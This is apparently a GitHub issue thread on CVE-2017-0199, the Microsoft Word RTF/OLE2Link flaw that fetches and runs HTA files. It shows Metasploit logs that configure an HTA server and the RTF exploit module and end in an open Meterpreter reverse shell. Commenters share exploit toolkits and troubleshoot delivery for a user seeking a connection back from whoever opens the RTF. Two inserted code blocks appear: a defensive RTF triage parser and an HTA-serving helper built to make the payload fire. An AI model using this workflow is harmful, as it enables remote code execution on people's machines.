  Name       Current Setting                 Required  Description
  ----       ---------------                 --------  -----------
  TARGETURI  http://192.168.206.144/poc.rtf  yes       The path to a hta file.

Payload information:

Description:
  This module creates a malicious RTF file that when opened in
  vulnerable versions of Microsoft Word will lead to code execution.
  The flaw exists in how an olelink object can make an http(s) request,
  and execute the response in hta format. This bug was originally seen
  being exploited in the wild starting in Oct 2016. This module was
  created by reversing a public malware sample.

References:
  https://cvedetails.com/cve/CVE-2017-0199/
  https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/
  https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html
  https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/
  https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html
  https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html
  https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf
  https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/
  https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100
  https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/
  https://www.microsoft.com/en-us/download/details.aspx?id=10725
  https://msdn.microsoft.com/en-us/library/dd942294.aspx
  https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf
msf exploit(ms17_0199_rtf) > run

[+]  stored at /Users/nixawk/.msf4/local/local_1492191967.bin
~ ->> rtfobj /Users/nixawk/.msf4/local/local_1492191967.bin
rtfobj 0.50 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

===============================================================================
File: '/Users/nixawk/.msf4/local/local_1492191967.bin' - size: 5751 bytes
---+----------+-------------------------------+-------------------------------
id |index     |OLE Object                     |OLE Package
---+----------+-------------------------------+-------------------------------
0  |000001BCh |format_id: 2                   |Not an OLE Package
   |          |class name: 'OLE2Link'         |
   |          |data size: 2560                |
---+----------+-------------------------------+-------------------------------
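
The rtfobj output above shows the two fields that matter for triage: an OLE1 ObjectHeader with format_id 2 (embedded) and class name 'OLE2Link', wrapping native data that carries the link the target will fetch. The script below is an added example, not part of the ms17_0199_rtf module and not something posted in this thread. It pulls the \objdata hex out of an RTF, parses the [MS-OLEDS] ObjectHeader (OLEVersion, FormatID, three LengthPrefixedAnsiStrings), and scans the embedded native data for a URL moniker (the documented CLSID 79EAC9E0-BAF9-11CE-8C82-00AA004BA90B followed by a 4-byte length and a NUL-terminated UTF-16LE URL) to recover the target URL. The RTF it builds for itself is a constructed fixture, not a real malicious document, and the \objupdate flag is a heuristic of mine, not something the thread states.

```python
"""Triage an RTF for a CVE-2017-0199-style OLE2Link object and recover its URL.

Added example; not the Metasploit module's code. Layouts follow [MS-OLEDS]
(OLE1 ObjectHeader, LengthPrefixedAnsiString, URLMoniker); the URL moniker
CLSID is the documented {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B}.
"""
import re
import struct
import sys
import uuid

# URL moniker CLSID as it is laid out inside the OLE stream (little-endian GUID).
URL_MONIKER_CLSID = uuid.UUID("79EAC9E0-BAF9-11CE-8C82-00AA004BA90B").bytes_le

# {\*\objdata <hex>} : the hex run ends at the closing brace.
OBJDATA_RE = re.compile(rb"\\\*\\objdata\s*([0-9a-fA-F\s]+)")


def read_lp_ansi(buf, off):
    """LengthPrefixedAnsiString: 4-byte LE length, then that many bytes (NUL-terminated)."""
    (n,) = struct.unpack_from("<I", buf, off)
    s = buf[off + 4:off + 4 + n]
    return s.rstrip(b"\x00").decode("latin-1"), off + 4 + n


def parse_ole1_header(blob):
    """Parse the OLE1 ObjectHeader at the start of an \\objdata blob."""
    version, format_id = struct.unpack_from("<II", blob, 0)
    off = 8
    class_name, off = read_lp_ansi(blob, off)
    topic_name, off = read_lp_ansi(blob, off)
    item_name, off = read_lp_ansi(blob, off)
    return {"version": version, "format_id": format_id, "class_name": class_name,
            "topic_name": topic_name, "item_name": item_name, "header_len": off}


def extract_url_monikers(native):
    """Find every URL moniker in the native data and decode the UTF-16LE URL after it."""
    urls = []
    pos = native.find(URL_MONIKER_CLSID)
    while pos != -1:
        off = pos + len(URL_MONIKER_CLSID)
        (length,) = struct.unpack_from("<I", native, off)   # bytes of URL (+ optional trailer)
        raw = native[off + 4:off + 4 + length]
        urls.append(raw.decode("utf-16-le", errors="replace").split("\x00", 1)[0])
        pos = native.find(URL_MONIKER_CLSID, off + 4 + length)
    return urls


def triage_rtf(rtf_bytes):
    """Return one finding per \\objdata object found in the RTF."""
    findings = []
    for m in OBJDATA_RE.finditer(rtf_bytes):
        hexdata = re.sub(rb"\s+", b"", m.group(1))
        hexdata = hexdata[:len(hexdata) & ~1]              # drop a dangling nibble
        blob = bytes.fromhex(hexdata.decode("ascii"))
        hdr = parse_ole1_header(blob)
        native = b""
        if hdr["format_id"] == 2:                          # embedded: NativeDataSize + NativeData
            (size,) = struct.unpack_from("<I", blob, hdr["header_len"])
            start = hdr["header_len"] + 4
            native = blob[start:start + size]
        urls = extract_url_monikers(native)
        findings.append({
            "class_name": hdr["class_name"],
            "format_id": hdr["format_id"],
            "native_size": len(native),
            "urls": urls,
            # \objupdate asks Word to refresh the link on open; heuristic, not proof.
            "objupdate": b"\\objupdate" in rtf_bytes,
            "suspicious": hdr["class_name"] == "OLE2Link" and bool(urls),
        })
    return findings


def build_sample_rtf(url):
    """Constructed fixture (not a real sample): an OLE1 header with class 'OLE2Link'
    around fake native data that holds a URL moniker for `url`."""
    def lp(s):
        s = s.encode("ascii") + b"\x00"
        return struct.pack("<I", len(s)) + s
    u16 = url.encode("utf-16-le") + b"\x00\x00"
    native = b"\x00" * 32 + URL_MONIKER_CLSID + struct.pack("<I", len(u16)) + u16 + b"\x00" * 16
    header = struct.pack("<II", 0x0501, 2) + lp("OLE2Link") + lp("") + lp("")
    blob = header + struct.pack("<I", len(native)) + native
    return (b"{\\rtf1{\\object\\objautlink\\objupdate{\\*\\objclass Word.Document.8}"
            b"{\\*\\objdata " + blob.hex().encode("ascii") + b"}}}")


if __name__ == "__main__":
    if len(sys.argv) > 1:
        data = open(sys.argv[1], "rb").read()
    else:
        data = build_sample_rtf("http://example.invalid/test")
    for finding in triage_rtf(data):
        print(finding)
```

Run it as `python triage_rtf.py local_1492191967.bin` against the file the module writes; the class name and native size it prints should line up with the rtfobj table above, and the urls field gives the TARGETURI baked into the document without opening it in Word.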

nixawk commented 7 years ago

msf exploit(hta_server) > show options

Module options (exploit/windows/misc/hta_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Powershell x86

msf exploit(hta_server) > set URIPATH /test
URIPATH => /test
msf exploit(hta_server) > run -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.1.102:4444
[*] Using URL: http://0.0.0.0:8080/test
[*] Local IP: http://192.168.1.102:8080/test
[*] Server started.
msf exploit(hta_server) > use exploit/windows/fileformat/ms17_0199_rtf
msf exploit(ms17_0199_rtf) > show options

Module options (exploit/windows/fileformat/ms17_0199_rtf):

   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   TARGETURI  http://example.com/test.rtf  yes       The path to a hta file.

Exploit target:

   Id  Name
   --  ----
   0   Microsoft Office

msf exploit(ms17_0199_rtf) > set TARGETURI http://192.168.1.102:8080/test
TARGETURI => http://192.168.1.102:8080/test
msf exploit(ms17_0199_rtf) > run

[+]  stored at /Users/Open-Security/.msf4/local/local_1492193615.bin
msf exploit(ms17_0199_rtf) >
[*] 192.168.1.103    hta_server - Delivering Payload
[*] 192.168.1.103    hta_server - Delivering Payload
[*] Sending stage (957487 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.103:2187) at 2017-04-14 13:17:45 -0500

msf exploit(ms17_0199_rtf) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : JOHN
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : SECLAB
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter >
busterb commented 7 years ago

Nice work @nixawk !

vysecurity commented 7 years ago

Nice work @nixawk :)

demonsec666 commented 7 years ago

Hi man! Can you provide the ms17_0199_rtf.rb code @nixawk

demonsec666 commented 7 years ago

Ruby code?? @nixawk

demonsec666 commented 7 years ago

metasploit?

vysecurity commented 7 years ago

@demonsec666 I think Nixawk will submit it as a PR. This isn't a support thread.

https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/

nixawk commented 7 years ago

I will. Please wait several days.

demonsec666 commented 7 years ago

thanks @nixawk

nixawk commented 7 years ago

@vysec @busterb @demonsec666 Please check https://github.com/rapid7/metasploit-framework/pull/8254

demonsec666 commented 7 years ago

Nice work!thanks :)

jork2345 commented 7 years ago

gre

bhdresh commented 7 years ago

Nice one, thank you,

Meanwhile this was my attempt to get meterpreter shell through CVE-2017-0199

https://github.com/bhdresh/CVE-2017-0199

nixawk commented 7 years ago

If the dev team handles https://github.com/rapid7/metasploit-framework/pull/8253, maybe I'll try a new one with a meterpreter session.

vysecurity commented 7 years ago

Just FYI. OLE links made in 2016 differ from other versions such as 2013. Therefore I found that a 2016 document could not be triggered on a 2013 machine.

nixawk commented 7 years ago

@vysec Could you share a copy ?

moaeddy commented 7 years ago

I have been trying to figure this out but can't seem to get it. I host a .hta file and insert it via Insert > Object, but can't see any hta file executing. Can someone share how this can be achieved?

bhdresh commented 7 years ago

Hi,

Are you trying with "exploit/windows/misc/hta_server"? It was not working for me either. It pops up a black screen but there is no reverse connection from the reverse shell.

To overcome this I wrote a quick py script which can generate a malicious doc based on @nixawk's https://github.com/nixawk template and also act as an HTA web server to deliver the payloads.

Have a look @ https://github.com/bhdresh/CVE-2017-0199

Regards, -Bhadresh

nixawk commented 7 years ago

Please try it with an IE cache clean.

moaeddy commented 7 years ago

thanks for your response

Am I doing this wrong? What I did was: I host an .hta file, insert it as an object in MS Word, then save it as .rtf.

I tried your Python script before messaging here, but it gives the error shown in this image:

http://prntscr.com/ey5bg0

Can you kindly put me through properly, as I am using a custom .hta and a custom way to get a connection from the user who runs the .rtf file?

nixawk commented 7 years ago

@hostbob I've created a py script for the job.

https://github.com/nixawk/labs/blob/master/CVE-2017-0199/exploit.py

bhdresh commented 7 years ago

@hostbob,

Hosting and inserting an .hta file manually will directly execute it while inserting it into the rtf.

For the script, try to execute the python script as "python cve-2017-0199_toolkit.py -h"

https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/master/cve-2017-0199_toolkit.py

Regards, -Bhadresh

moaeddy commented 7 years ago

I really appreciate your time bro, this is what I have done:

https://2.lithi.io/qDoxsQ5.png https://2.lithi.io/z8WFm.png https://2.lithi.io/oXANtQ.png https://2.lithi.io/YyMnq.png

But I am getting an error at the end of execution; kindly advise what I am missing.

moaeddy commented 7 years ago

Oh, lest I forget: tested on Windows 7 32-bit with MS Word 2007, and also on Windows 8 with MS Word 2010 32-bit.

jymcheong commented 7 years ago

If some of you are having difficulty reproducing the observation in Win7, you are likely using a fresh Win7, see https://www.youtube.com/watch?v=ac6LM7WAx64

I noted @nixawk's observation regarding the registry key, but it seems like a fresh Win7, regardless of SP1 or not, is not vulnerable. By "fresh", I mean hardly any patches installed. See the video for yourself. The VM that has the black background also has reg_sz:ole32.dll for that registry key but was able to pop a calculator.

moaeddy commented 7 years ago

Saw the video, but this was tested against Windows 7 32-bit in VMware and Windows 8 32-bit in VMware. Does this also affect Windows 8 and Windows Server 2008? I only got a pop-up warning, but the file was not executed.

bhdresh commented 7 years ago

@hostbob, looks like the document was generated properly.

As per the instructions, once the document is opened it will request http://2.lithi.io/5LjNsE.HTA and try to execute it.

Please share what is not working here. Are you not receiving the "https://2.lithi.io/5LjNsE.HTA" request from the target once the document is opened, or is the HTA not getting executed after delivery? It seems "https://2.lithi.io/5LjNsE.HTA" is not delivering the toolkit's HTA, which is tested and working fine.

If you want to use a custom HTA, please make sure it is getting executed and not hitting any error.

I recommend pointing "https://2.lithi.io/5LjNsE.HTA" to the machine where the tool is running and starting the toolkit in exploitation mode (-M exp) with the required parameters.

For this, you could follow steps 2 and 3 specified in the README.md or listed at https://github.com/bhdresh/CVE-2017-0199

Thanks a lot.

Regards, -Bhadresh

jymcheong commented 7 years ago

@hostbob,

@bhdresh asked good questions. Try with a simple test case first, e.g. the launch-calculator HTA script that was shared earlier in this thread. If that works, then it has something to do with the custom HTA.

If even the simple test-case doesn't work, check that your web-server that is hosting the HTA file is forcing Content-Type as application/hta, otherwise the hta would just be rendered in the linked object.
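
The Content-Type requirement above is easy to get wrong with a stock web server, and it compounds with the IE cache point made earlier in the thread: a copy cached with the wrong type keeps failing until the cache is cleared. What follows is an added example for a lab setup, not the hta_server module and not the toolkit linked in this thread. It wraps Python's http.server so that .hta files are sent as application/hta and every response carries no-cache headers. The host, port and directory are placeholders; the reason for forcing the type (otherwise the HTA is rendered inside the linked object) is taken from the comment above.

```python
"""Serve .hta files as application/hta with no-cache headers (lab helper).

Added example; not the hta_server module and not the toolkit linked in this
thread. Host, port and directory below are placeholders.
"""
import functools
import http.server
import mimetypes
import threading

HTA_CONTENT_TYPE = "application/hta"


def content_type_for(path):
    """Content-Type for a request path: .hta goes out as application/hta so the
    client treats it as an HTA instead of rendering it inside the linked object;
    anything else uses the normal mimetypes guess."""
    path = path.split("?", 1)[0]
    if path.lower().endswith(".hta"):
        return HTA_CONTENT_TYPE
    guessed, _ = mimetypes.guess_type(path)
    return guessed or "application/octet-stream"


def response_headers(path):
    """Full header set for one response: forced type plus no-cache, so a stale
    copy in the IE/WinINet cache is not replayed on the next test run."""
    return {
        "Content-Type": content_type_for(path),
        "Cache-Control": "no-store, no-cache, must-revalidate",
        "Pragma": "no-cache",
        "Expires": "0",
    }


class HtaHandler(http.server.SimpleHTTPRequestHandler):
    """SimpleHTTPRequestHandler that applies response_headers() to every reply."""

    def guess_type(self, path):
        # send_head() calls this and emits the result as Content-Type.
        return content_type_for(path)

    def end_headers(self):
        for name, value in response_headers(self.path).items():
            if name != "Content-Type":          # send_head() already set it
                self.send_header(name, value)
        super().end_headers()

    def log_message(self, fmt, *args):
        # One line per request so a fetch from the target is visible immediately.
        print("%s - %s" % (self.client_address[0], fmt % args))


def serve(directory, host="0.0.0.0", port=8080):
    """Serve `directory` on host:port in a background thread; returns the server."""
    handler = functools.partial(HtaHandler, directory=directory)
    httpd = http.server.ThreadingHTTPServer((host, port), handler)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return httpd


if __name__ == "__main__":
    import os
    srv = serve(os.getcwd())
    print("serving %s on %s:%d" % ((os.getcwd(),) + srv.server_address))
    threading.Event().wait()   # block until Ctrl-C
```

Drop your test HTA in the directory, point the RTF's link at http://<host>:8080/test.hta, and confirm with a plain HTTP client that the response carries Content-Type: application/hta before blaming the document.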

bhdresh commented 7 years ago

@jymcheong , thank you :)

@hostbob, just follow the instructions provided in the guide at https://github.com/bhdresh/CVE-2017-0199. The toolkit can act as an HTA + web server, so just point the HTA URL you are including in the RTF to the toolkit port in exploitation mode and it's done :)

Please feel free to ask if you have any question or issue.

Regards, -Bhadresh

moaeddy commented 7 years ago

OK, I am going to admit I am dumb and can't seem to get this. I do not know what I am really missing. @bhdresh can you please inbox me your email or IM ID at edwardmoa@mail.ru? Maybe an instant chat will solve this.

Thank you @jymcheong for your contribution as well

bhdresh commented 7 years ago

@hostbob , no issues buddy, I sent you an email :)

moaeddy commented 7 years ago

@bhdresh I think you are busy. Does anyone still have an interest in helping out with this? I am using a custom hta file. What I do not understand is: can this exploit work without using the Metasploit thing, and is it only hta files it can work on? Kindly share your ideas, brothers. I would love to see myself being successful testing this; I hate trying to test something and seeing myself not getting it :D

bhdresh commented 7 years ago

@hostbob, I am updating the python script at https://github.com/bhdresh/CVE-2017-0199 to push a custom hta.

Usage: python cve-2017-0199.py -M exp -H custom.hta

Hope this will help.

moaeddy commented 7 years ago

You have been really helpful @bhdresh, I really appreciate your help from the start. When do you think it will be done?

bhdresh commented 7 years ago

Please try beta version from https://github.com/bhdresh/CVE-2017-0199/blob/v2.0-beta-3/cve-2017-0199_toolkit.py

snemes commented 7 years ago

Just a sidenote, you will need to have Internet Explorer 10 installed for the exploit to work under (a fresh) Windows 7.

moaeddy commented 7 years ago

How about Windows 8, 8.1 and 10, both 32- and 64-bit? Do they require this as well?

snemes commented 7 years ago

As far as I know Windows 8 already comes with Internet Explorer 10 preinstalled, so I guess you don't need to do anything there - but I have not tried it. If you do, please share the results with us too. :)